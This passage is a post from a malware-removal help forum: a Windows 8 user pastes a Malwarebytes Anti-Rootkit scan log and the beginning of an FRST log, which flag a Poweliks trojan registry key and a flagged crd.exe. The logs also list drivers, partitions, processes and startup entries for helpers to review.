Forums
New posts
Search forums
News
Security News
Technology News
Giveaways
Giveaways, Promotions and Contests
Discounts & Deals
Reviews
Users Reviews
Video Reviews
Support
Windows Malware Removal Help & Support
Mac Malware Removal Help & Support
Mobile Malware Removal Help & Support
Blog
Log in
Register
What's new
Search
Search titles only
By:
Search titles only
By:
Reply to thread
Menu
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Forums
Support
Windows Malware Removal Help & Support
windows powershell popup and sysWOW64\dllhost.exe blocked by Malwarebytes
Message
<blockquote data-quote="stanm" data-source="post: 308296" data-attributes="member: 31324"><p>Malwarebytes Anti-Rootkit BETA 1.08.2.1001</p><p><a href="http://www.malwarebytes.org" target="_blank">www.malwarebytes.org</a></p><p></p><p>Database version: v2014.12.01.03</p><p></p><p>Windows 8 x64 NTFS</p><p>Internet Explorer 10.0.9200.16466</p><p>johnsmith :: JASONSTORM [administrator]</p><p></p><p>12/1/2014 7:59:02 AM</p><p>mbar-log-2014-12-01 (07-59-02).txt</p><p></p><p>Scan type: Quick scan</p><p>Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken</p><p>Scan options disabled: </p><p>Objects scanned: 337935</p><p>Time elapsed: 55 minute(s), 22 second(s)</p><p></p><p>Memory Processes Detected: 0</p><p>(No malicious items detected)</p><p></p><p>Memory Modules Detected: 0</p><p>(No malicious items detected)</p><p></p><p>Registry Keys Detected: 1</p><p>HKU\S-1-5-21-2762839642-1568754923-376086736-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} (Trojan.Poweliks.B) -> Delete on reboot. [d1d60459d6a63cfaeba244be25db7987]</p><p></p><p>Registry Values Detected: 0</p><p>(No malicious items detected)</p><p></p><p>Registry Data Items Detected: 0</p><p>(No malicious items detected)</p><p></p><p>Folders Detected: 0</p><p>(No malicious items detected)</p><p></p><p>Files Detected: 3</p><p>C:\Users\johnsmith\Desktop\Software\bestcrypt\crd.exe (TheftMarker.Crude) -> Delete on reboot. [ccdb7ae374083600e207281603ff0ef2]</p><p>C:\Users\johnsmith\Desktop\Software\bestcrypt\crd.exe.bak (TheftMarker.Crude) -> Delete on reboot. [bdea3627ee8e61d525c49f9fd032718f]</p><p>C:\Users\johnsmith\Desktop\Software\bestcrypt\crd.exe.bak.bak (TheftMarker.Crude) -> Delete on reboot. [f2b54914eb912f0744a54fefd42ee21e]</p><p></p><p>Physical Sectors Detected: 0</p><p>(No malicious items detected)</p><p></p><p>(end)</p><p></p><p></p><p></p><p>Malwarebytes Anti-Rootkit BETA 1.08.2.1001</p><p></p><p>(c) Malwarebytes Corporation 2011-2012</p><p></p><p>OS version: 6.2.9200 Windows 8 x64</p><p></p><p>Account is Administrative</p><p></p><p>Internet Explorer version: 10.0.9200.16466</p><p></p><p>File system is: NTFS</p><p>Disk drives: C:\ DRIVE_FIXED, D:\ DRIVE_FIXED</p><p>CPU speed: 2.494000 GHz</p><p>Memory total: 8467005440, free: 6794969088</p><p></p><p>---------------------------------------</p><p>Malwarebytes Anti-Rootkit BETA 1.08.2.1001</p><p></p><p>(c) Malwarebytes Corporation 2011-2012</p><p></p><p>OS version: 6.2.9200 Windows 8 x64</p><p></p><p>Account is Administrative</p><p></p><p>Internet Explorer version: 10.0.9200.16466</p><p></p><p>File system is: NTFS</p><p>Disk drives: C:\ DRIVE_FIXED, D:\ DRIVE_FIXED</p><p>CPU speed: 2.494000 GHz</p><p>Memory total: 8467005440, free: 6802513920</p><p></p><p>Downloaded database version: v2014.12.01.03</p><p>Downloaded database version: v2014.12.01.01</p><p>=======================================</p><p>Initializing...</p><p>This version of Malwarebytes Anti-Rootkit requires you to completely exit the Malwarebytes Anti-Malware application to continue.</p><p>Initializing...</p><p>======================</p><p>------------ Kernel report ------------</p><p> 12/01/2014 07:58:53</p><p>------------ Loaded modules -----------</p><p>\SystemRoot\system32\ntoskrnl.exe</p><p>\SystemRoot\system32\hal.dll</p><p>\SystemRoot\system32\kd.dll</p><p>\SystemRoot\system32\mcupdate_GenuineIntel.dll</p><p>\SystemRoot\System32\drivers\CLFS.SYS</p><p>\SystemRoot\System32\drivers\tm.sys</p><p>\SystemRoot\system32\PSHED.dll</p><p>\SystemRoot\system32\BOOTVID.dll</p><p>\SystemRoot\system32\CI.dll</p><p>\SystemRoot\System32\drivers\msrpc.sys</p><p>\SystemRoot\system32\drivers\Wdf01000.sys</p><p>\SystemRoot\system32\drivers\WDFLDR.SYS</p><p>\SystemRoot\System32\Drivers\acpiex.sys</p><p>\SystemRoot\System32\Drivers\WppRecorder.sys</p><p>\SystemRoot\System32\drivers\ACPI.sys</p><p>\SystemRoot\System32\drivers\WMILIB.SYS</p><p>\SystemRoot\System32\Drivers\cng.sys</p><p>\SystemRoot\System32\drivers\msisadrv.sys</p><p>\SystemRoot\System32\drivers\pci.sys</p><p>\SystemRoot\System32\drivers\vdrvroot.sys</p><p>\SystemRoot\system32\drivers\pdc.sys</p><p>\SystemRoot\System32\drivers\partmgr.sys</p><p>\SystemRoot\System32\drivers\spaceport.sys</p><p>\SystemRoot\System32\drivers\volmgr.sys</p><p>\SystemRoot\System32\drivers\volmgrx.sys</p><p>\SystemRoot\System32\drivers\mountmgr.sys</p><p>\SystemRoot\System32\drivers\iaStorA.sys</p><p>\SystemRoot\System32\drivers\storport.sys</p><p>\SystemRoot\System32\drivers\EhStorClass.sys</p><p>\SystemRoot\system32\drivers\fltmgr.sys</p><p>\SystemRoot\System32\drivers\fileinfo.sys</p><p>\SystemRoot\system32\drivers\WdFilter.sys</p><p>\SystemRoot\System32\Drivers\Ntfs.sys</p><p>\SystemRoot\System32\Drivers\ksecdd.sys</p><p>\SystemRoot\System32\drivers\pcw.sys</p><p>\SystemRoot\System32\Drivers\Fs_Rec.sys</p><p>\SystemRoot\system32\drivers\ndis.sys</p><p>\SystemRoot\system32\drivers\NETIO.SYS</p><p>\SystemRoot\System32\Drivers\ksecpkg.sys</p><p>\SystemRoot\System32\drivers\tcpip.sys</p><p>\SystemRoot\System32\drivers\fwpkclnt.sys</p><p>\SystemRoot\system32\DRIVERS\wfplwfs.sys</p><p>\SystemRoot\System32\DRIVERS\fvevol.sys</p><p>\SystemRoot\system32\DRIVERS\hpdskflt.sys</p><p>\SystemRoot\System32\drivers\wd.sys</p><p>\SystemRoot\System32\drivers\volsnap.sys</p><p>\SystemRoot\System32\drivers\rdyboost.sys</p><p>\SystemRoot\System32\Drivers\mup.sys</p><p>\SystemRoot\System32\drivers\disk.sys</p><p>\SystemRoot\System32\drivers\CLASSPNP.SYS</p><p>\SystemRoot\System32\Drivers\crashdmp.sys</p><p>\SystemRoot\System32\drivers\cdrom.sys</p><p>\SystemRoot\System32\Drivers\Null.SYS</p><p>\SystemRoot\System32\Drivers\Beep.SYS</p><p>\SystemRoot\System32\drivers\BasicRender.sys</p><p>\SystemRoot\System32\drivers\dxgkrnl.sys</p><p>\SystemRoot\System32\drivers\watchdog.sys</p><p>\SystemRoot\System32\drivers\dxgmms1.sys</p><p>\SystemRoot\System32\drivers\BasicDisplay.sys</p><p>\SystemRoot\System32\Drivers\Npfs.SYS</p><p>\SystemRoot\System32\Drivers\Msfs.SYS</p><p>\SystemRoot\system32\DRIVERS\tdx.sys</p><p>\SystemRoot\system32\DRIVERS\TDI.SYS</p><p>\SystemRoot\System32\DRIVERS\netbt.sys</p><p>\SystemRoot\system32\drivers\afd.sys</p><p>\SystemRoot\system32\DRIVERS\pacer.sys</p><p>\SystemRoot\system32\DRIVERS\vwififlt.sys</p><p>\SystemRoot\system32\DRIVERS\netbios.sys</p><p>\SystemRoot\system32\DRIVERS\rdbss.sys</p><p>\SystemRoot\system32\DRIVERS\wanarp.sys</p><p>\SystemRoot\system32\drivers\nsiproxy.sys</p><p>\SystemRoot\System32\drivers\npsvctrig.sys</p><p>\SystemRoot\System32\drivers\mssmbios.sys</p><p>\SystemRoot\System32\drivers\discache.sys</p><p>\SystemRoot\System32\Drivers\dfsc.sys</p><p>\SystemRoot\system32\DRIVERS\CLVirtualDrive.sys</p><p>\SystemRoot\system32\DRIVERS\ndistapi.sys</p><p>\SystemRoot\system32\DRIVERS\ndiswan.sys</p><p>\SystemRoot\system32\DRIVERS\rassstp.sys</p><p>\SystemRoot\system32\DRIVERS\AgileVpn.sys</p><p>\SystemRoot\system32\DRIVERS\tunnel.sys</p><p>\SystemRoot\System32\drivers\CompositeBus.sys</p><p>\SystemRoot\system32\DRIVERS\kdnic.sys</p><p>\SystemRoot\System32\drivers\umbus.sys</p><p>\SystemRoot\system32\DRIVERS\igdkmd64.sys</p><p>\SystemRoot\System32\drivers\USBXHCI.SYS</p><p>\SystemRoot\System32\drivers\ucx01000.sys</p><p>\SystemRoot\System32\drivers\HECIx64.sys</p><p>\SystemRoot\System32\drivers\usbehci.sys</p><p>\SystemRoot\System32\drivers\USBPORT.SYS</p><p>\SystemRoot\System32\drivers\HDAudBus.sys</p><p>\SystemRoot\system32\DRIVERS\RtsBaStor.sys</p><p>\SystemRoot\system32\DRIVERS\Rt630x64.sys</p><p>\SystemRoot\System32\drivers\i8042prt.sys</p><p>\SystemRoot\system32\DRIVERS\SynTP.sys</p><p>\SystemRoot\system32\DRIVERS\USBD.SYS</p><p>\SystemRoot\System32\drivers\kbdclass.sys</p><p>\SystemRoot\System32\drivers\mouclass.sys</p><p>\SystemRoot\System32\drivers\CmBatt.sys</p><p>\SystemRoot\System32\drivers\BATTC.SYS</p><p>\SystemRoot\system32\DRIVERS\Smb_driver_Intel.sys</p><p>\SystemRoot\system32\DRIVERS\Accelerometer.sys</p><p>\SystemRoot\System32\drivers\wmiacpi.sys</p><p>\SystemRoot\System32\drivers\WirelessButtonDriver64.sys</p><p>\SystemRoot\System32\drivers\HIDCLASS.SYS</p><p>\SystemRoot\System32\drivers\HIDPARSE.SYS</p><p>\SystemRoot\System32\drivers\intelppm.sys</p><p>\SystemRoot\system32\DRIVERS\raspptp.sys</p><p>\SystemRoot\system32\DRIVERS\rasl2tp.sys</p><p>\SystemRoot\system32\DRIVERS\raspppoe.sys</p><p>\SystemRoot\System32\drivers\swenum.sys</p><p>\SystemRoot\System32\drivers\ks.sys</p><p>\SystemRoot\System32\drivers\rdpbus.sys</p><p>\SystemRoot\System32\Drivers\NDProxy.SYS</p><p>\SystemRoot\System32\drivers\usbhub.sys</p><p>\SystemRoot\System32\drivers\UsbHub3.sys</p><p>\SystemRoot\system32\DRIVERS\stwrt64.sys</p><p>\SystemRoot\system32\DRIVERS\portcls.sys</p><p>\SystemRoot\system32\DRIVERS\drmk.sys</p><p>\SystemRoot\system32\drivers\ksthunk.sys</p><p>\SystemRoot\system32\DRIVERS\IntcDAud.sys</p><p>\SystemRoot\System32\drivers\hidusb.sys</p><p>\SystemRoot\System32\drivers\mouhid.sys</p><p>\SystemRoot\System32\drivers\usbccgp.sys</p><p>\SystemRoot\System32\Drivers\usbvideo.sys</p><p>\SystemRoot\System32\Drivers\fastfat.SYS</p><p>\SystemRoot\System32\Drivers\dump_diskdump.sys</p><p>\SystemRoot\System32\Drivers\dump_iaStorA.sys</p><p>\SystemRoot\System32\Drivers\dump_dumpfve.sys</p><p>\SystemRoot\System32\win32k.sys</p><p>\SystemRoot\system32\DRIVERS\monitor.sys</p><p>\SystemRoot\System32\TSDDD.dll</p><p>\SystemRoot\System32\cdd.dll</p><p>\SystemRoot\System32\ATMFD.DLL</p><p>\SystemRoot\system32\drivers\luafv.sys</p><p>\SystemRoot\system32\drivers\WudfPf.sys</p><p>\SystemRoot\System32\drivers\WinUSB.sys</p><p>\SystemRoot\System32\drivers\WUDFRd.sys</p><p>\SystemRoot\system32\DRIVERS\lltdio.sys</p><p>\SystemRoot\system32\DRIVERS\nwifi.sys</p><p>\SystemRoot\system32\DRIVERS\ndisuio.sys</p><p>\SystemRoot\system32\DRIVERS\rspndr.sys</p><p>\SystemRoot\system32\drivers\HTTP.sys</p><p>\SystemRoot\system32\DRIVERS\bowser.sys</p><p>\SystemRoot\System32\drivers\mpsdrv.sys</p><p>\SystemRoot\system32\DRIVERS\mrxsmb.sys</p><p>\SystemRoot\system32\DRIVERS\mrxsmb10.sys</p><p>\SystemRoot\system32\DRIVERS\mrxsmb20.sys</p><p>\SystemRoot\system32\drivers\Ndu.sys</p><p>\SystemRoot\system32\drivers\peauth.sys</p><p>\SystemRoot\System32\Drivers\secdrv.SYS</p><p>\SystemRoot\System32\DRIVERS\srvnet.sys</p><p>\SystemRoot\System32\drivers\tcpipreg.sys</p><p>\SystemRoot\System32\DRIVERS\srv2.sys</p><p>\SystemRoot\System32\DRIVERS\srv.sys</p><p>\??\C:\Windows\system32\drivers\hitmanpro37.sys</p><p>\SystemRoot\system32\DRIVERS\cdfs.sys</p><p>\SystemRoot\System32\drivers\condrv.sys</p><p>\SystemRoot\system32\DRIVERS\netr28x.sys</p><p>\SystemRoot\System32\drivers\vwifibus.sys</p><p>\SystemRoot\system32\DRIVERS\vwifimp.sys</p><p>\??\C:\Windows\system32\drivers\mbamchameleon.sys</p><p>\??\C:\Windows\system32\drivers\MBAMSwissArmy.sys</p><p>----------- End -----------</p><p>Done!</p><p><<<1>>></p><p>Upper Device Name: \Device\Harddisk0\DR0</p><p>Upper Device Object: 0xfffffa80096d8060</p><p>Upper Device Driver Name: \Driver\disk\</p><p>Lower Device Name: \Device\00000047\</p><p>Lower Device Object: 0xfffffa8007d6f2b0</p><p>Lower Device Driver Name: \Driver\iaStorA\</p><p><<<2>>></p><p>Physical Sector Size: 512</p><p>Drive: 0, DevicePointer: 0xfffffa80096d8060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\</p><p>--------- Disk Stack ------</p><p>DevicePointer: 0xfffffa80096d8b10, DeviceName: Unknown, DriverName: \Driver\partmgr\</p><p>DevicePointer: 0xfffffa80096d8060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\</p><p>DevicePointer: 0xfffffa8008796b10, DeviceName: Unknown, DriverName: \Driver\hpdskflt\</p><p>DevicePointer: 0xfffffa8007d6f2b0, DeviceName: \Device\00000047\, DriverName: \Driver\iaStorA\</p><p>------------ End ----------</p><p>Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\</p><p>Upper DeviceData: 0x0, 0x0, 0x0</p><p>Lower DeviceData: 0x0, 0x0, 0x0</p><p><<<3>>></p><p>Volume: C:</p><p>File system type: NTFS</p><p>SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes</p><p><<<2>>></p><p><<<3>>></p><p>Volume: C:</p><p>File system type: NTFS</p><p>SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes</p><p>Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...</p><p>Done!</p><p>Drive 0</p><p>This is a System drive</p><p>Scanning MBR on drive 0...</p><p>Inspecting partition table:</p><p>This drive is a GPT Drive.</p><p>MBR Signature: 55AA</p><p>Disk Signature: 4463ED8</p><p></p><p>GPT Protective MBR Partition information:</p><p></p><p> Partition 0 type is EFI-GPT (0xee)</p><p> Partition is NOT ACTIVE.</p><p> Partition starts at LBA: 1 Numsec = 1465149167</p><p></p><p> Partition 1 type is Empty (0x0)</p><p> Partition is NOT ACTIVE.</p><p> Partition starts at LBA: 0 Numsec = 0</p><p></p><p> Partition 2 type is Empty (0x0)</p><p> Partition is NOT ACTIVE.</p><p> Partition starts at LBA: 0 Numsec = 0</p><p></p><p> Partition 3 type is Empty (0x0)</p><p> Partition is NOT ACTIVE.</p><p> Partition starts at LBA: 0 Numsec = 0</p><p></p><p>GPT Partition information:</p><p></p><p> GPT Header Signature 4546492050415254</p><p> GPT Header Revision 65536 Size 92 CRC 4060582503</p><p> GPT Header CurrentLba = 1 BackupLba 1465149167</p><p> GPT Header FirstUsableLba 34 LastUsableLba 1465149134</p><p> GPT Header Guid db36cdd8-6a1-4593-82f7-fe8be9635ce3</p><p> GPT Header Contains 128 partition entries starting at LBA 2</p><p> GPT Header Partition entry size = 128</p><p></p><p> Backup GPT header Signature 4546492050415254</p><p> Backup GPT header Revision 65536 Size 92 CRC 4060582503</p><p> Backup GPT header CurrentLba = 1465149167 BackupLba 1</p><p> Backup GPT header FirstUsableLba 34 LastUsableLba 1465149134</p><p> Backup GPT header Guid db36cdd8-6a1-4593-82f7-fe8be9635ce3</p><p> Backup GPT header Contains 128 partition entries starting at LBA 1465149135</p><p> Backup GPT header Partition entry size = 128</p><p></p><p> Partition 0 Type de94bba4-6d1-4d40-a16a-bfd5179d6ac</p><p> Partition ID cc93694e-549f-490e-b691-2744edbc3472</p><p> FirstLBA 2048 Last LBA 821247</p><p> Attributes 1</p><p> Partition Name Basic data partition</p><p></p><p> Partition 1 Type c12a7328-f81f-11d2-ba4b-0a0c93ec93b</p><p> Partition ID 59e6ba52-631b-42dd-856d-9d753560f97b</p><p> FirstLBA 821248 Last LBA 1353727</p><p> Attributes 0</p><p> Partition Name EFI system partition</p><p></p><p> GPT Partition 1 is bootable</p><p> Partition 2 Type e3c9e316-b5c-4db8-817d-f92df0215ae</p><p> Partition ID 9a4c6918-cf88-492b-84ee-b13ab7aa249f</p><p> FirstLBA 1353728 Last LBA 1615871</p><p> Attributes 0</p><p> Partition Name Microsoft reserved partition</p><p></p><p> Partition 3 Type ebd0a0a2-b9e5-4433-87c0-68b6b72699c7</p><p> Partition ID 318bc6ab-44d7-469d-9893-cca19ba3d3a</p><p> FirstLBA 1615872 Last LBA 1409910783</p><p> Attributes 0</p><p> Partition Name Basic data partition</p><p></p><p> Partition 4 Type ebd0a0a2-b9e5-4433-87c0-68b6b72699c7</p><p> Partition ID fafe7be9-88d0-424f-8a61-d41894123c</p><p> FirstLBA 1409910784 Last LBA 1465135103</p><p> Attributes 1</p><p> Partition Name Basic data partition</p><p></p><p>Disk Size: 750156374016 bytes</p><p>Sector size: 512 bytes</p><p></p><p>Done!</p><p>Infected: C:\Users\johnsmith\Desktop\Software\bestcrypt\crd.exe --> [TheftMarker.Crude]</p><p>Infected: C:\Users\johnsmith\Desktop\Software\bestcrypt\crd.exe.bak --> [TheftMarker.Crude]</p><p>Infected: C:\Users\johnsmith\Desktop\Software\bestcrypt\crd.exe.bak.bak --> [TheftMarker.Crude]</p><p>Infected: HKU\S-1-5-21-2762839642-1568754923-376086736-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} --> [Trojan.Poweliks.B]</p><p>Scan finished</p><p>Creating System Restore point...</p><p>Cleaning up...</p><p>Removal scheduling successful. System shutdown needed.</p><p>System shutdown occurred</p><p>=======================================</p><p></p><p>Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 30-11-2014 01</p><p>Ran by johnsmith (administrator) on JASONSTORM on 01-12-2014 09:52:05</p><p>Running from C:\Users\johnsmith\Desktop\removal tools</p><p>Loaded Profile: johnsmith (Available profiles: johnsmith)</p><p>Platform: Windows 8 (X64) OS Language: English (United States)</p><p>Internet Explorer Version 10</p><p>Boot Mode: Normal</p><p>Tutorial for Farbar Recovery Scan Tool: <a href="http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/" target="_blank">http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/</a></p><p></p><p>==================== Processes (Whitelisted) =================</p><p></p><p>(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)</p><p></p><p>(HP) C:\Program Files (x86)\HP SimplePass\TrueSuiteService.exe</p><p>(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe</p><p>(IvoSoft) C:\Program Files\Classic Shell\ClassicShellService.exe</p><p>(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe</p><p>(ArcSoft Inc.) C:\Program Files (x86)\Common Files\ArcSoft\esinter\Bin\eservutil.exe</p><p>(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe</p><p>(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe</p><p>(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe</p><p>(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe</p><p>(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe</p><p>(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe</p><p>(Nalpeiron Ltd.) C:\Windows\SysWOW64\nlssrv32.exe</p><p>() C:\Windows\System32\valWBFPolicyService.exe</p><p>(AuthenTec Inc.) C:\Program Files (x86)\HP SimplePass\TouchControl.exe</p><p>(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe</p><p>(IvoSoft) C:\Program Files\Classic Shell\ClassicStartMenu.exe</p><p>(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe</p><p>(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe</p><p>(CyberLink) C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe</p><p>(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe</p><p>() C:\Program Files (x86)\HP SimplePass\IEWebSiteLogon.exe</p><p>(AuthenTec, Inc.) C:\Program Files\Common Files\AuthenTec\TrueService.exe</p><p>(AuthenTec, Inc.) C:\Program Files\Common Files\AuthenTec\TrueService.exe</p><p>(Intel Corporation) C:\Windows\System32\hkcmd.exe</p><p>(Intel Corporation) C:\Windows\System32\igfxpers.exe</p><p>(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe</p><p>(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe</p><p>(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe</p><p>(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe</p><p>(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe</p><p>(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe</p><p>(Nero AG) C:\Program Files (x86)\Nero\Update\NASvc.exe</p><p>(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe</p><p>(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe</p><p>(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</p><p>(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</p><p>(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</p><p>(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</p><p>(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe</p><p>(Kaspersky Lab ZAO) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 15.0.1\plugin-nm-server.exe</p><p>(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</p><p>(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</p><p></p><p></p><p>==================== Registry (Whitelisted) ==================</p><p></p><p>(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)</p><p></p><p>HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1425408 2012-07-21] (IDT, Inc.)</p><p>HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2916152 2012-08-24] (Synaptics Incorporated)</p><p>HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [446392 2012-04-04] (Adobe Systems Incorporated)</p><p>HKLM-x32\...\Run: [CLVirtualDrive] => C:\Program Files (x86)\CyberLink\Power2Go8\VirtualDrive.exe [491320 2012-07-26] (CyberLink Corp.)</p><p>HKLM-x32\...\Run: [] => [X]</p><p>HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [91432 2012-03-28] (CyberLink Corp.)</p><p>HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [580512 2012-07-31] (Hewlett-Packard Development Company, L.P.)</p><p>HKLM-x32\...\Run: [HP CoolSense] => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [1342008 2011-08-26] (Hewlett-Packard Development Company, L.P.)</p><p>HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)</p><p>HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated)</p><p>HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [946352 2012-12-18] (Adobe Systems Incorporated)</p><p>Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)</p><p>HKU\S-1-5-21-2762839642-1568754923-376086736-1001\...\Run: [AdobeBridge] => [X]</p><p>HKU\S-1-5-21-2762839642-1568754923-376086736-1001\...\Run: [FreeAC] => C:\Program Files (x86)\FreeAlarmClock\FreeAlarmClock.exe [1330008 2012-12-11] (Comfort Software Group)</p><p>ShellIconOverlayIdentifiers: [ShareOverlay] -> {594D4122-1F87-41E2-96C7-825FB4796516} => C:\Program Files\Classic Shell\ClassicExplorer64.dll (IvoSoft)</p><p>ShellIconOverlayIdentifiers-x32: [ShareOverlay] -> {594D4122-1F87-41E2-96C7-825FB4796516} => C:\Program Files\Classic Shell\ClassicExplorer32.dll (IvoSoft)</p><p></p><p>==================== Internet (Whitelisted) ====================</p><p></p><p>(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)</p><p></p><p>HKU\S-1-5-21-2762839642-1568754923-376086736-1001\Software\Microsoft\Internet Explorer\Main,Start Page = <a href="https://www.google.com/" target="_blank">https://www.google.com/</a></p><p>HKU\S-1-5-21-2762839642-1568754923-376086736-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = <a href="http://g.msn.com/HPNOT13/1" target="_blank">http://g.msn.com/HPNOT13/1</a></p><p>HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = <a href="http://g.msn.com/HPNOT13/1" target="_blank">http://g.msn.com/HPNOT13/1</a></p><p>HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = <a href="http://g.msn.com/HPNOT13/1" target="_blank">http://g.msn.com/HPNOT13/1</a></p><p>HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = <a href="http://g.msn.com/HPNOT13/1" target="_blank">http://g.msn.com/HPNOT13/1</a></p><p>HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = <a href="http://g.msn.com/HPNOT13/1" target="_blank">http://g.msn.com/HPNOT13/1</a></p><p>SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = <a href="http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=HPNTDFJS" target="_blank">http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=HPNTDFJS</a></p><p>SearchScopes: HKLM -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = <a href="http://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF" target="_blank">http://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF</a></p><p>SearchScopes: HKLM -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = <a href="http://rover.ebay.com/rover/1/711-154371-11896-2/4" target="_blank">http://rover.ebay.com/rover/1/711-154371-11896-2/4</a> ?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}</p><p>SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = <a href="http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=HPNTDFJS" target="_blank">http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=HPNTDFJS</a></p><p>SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = <a href="http://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF" target="_blank">http://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF</a></p><p>SearchScopes: HKLM-x32 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = <a href="http://rover.ebay.com/rover/1/711-154371-11896-2/4" target="_blank">http://rover.ebay.com/rover/1/711-154371-11896-2/4</a> ?mpre=http%3A%2F%2Fwww.ebay.com%2Fsch%2F%3F_nkw%3D{searchTerms}&keyword={searchTerms}</p><p>SearchScopes: HKU\S-1-5-21-2762839642-1568754923-376086736-1001 -> DefaultScope {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = <a 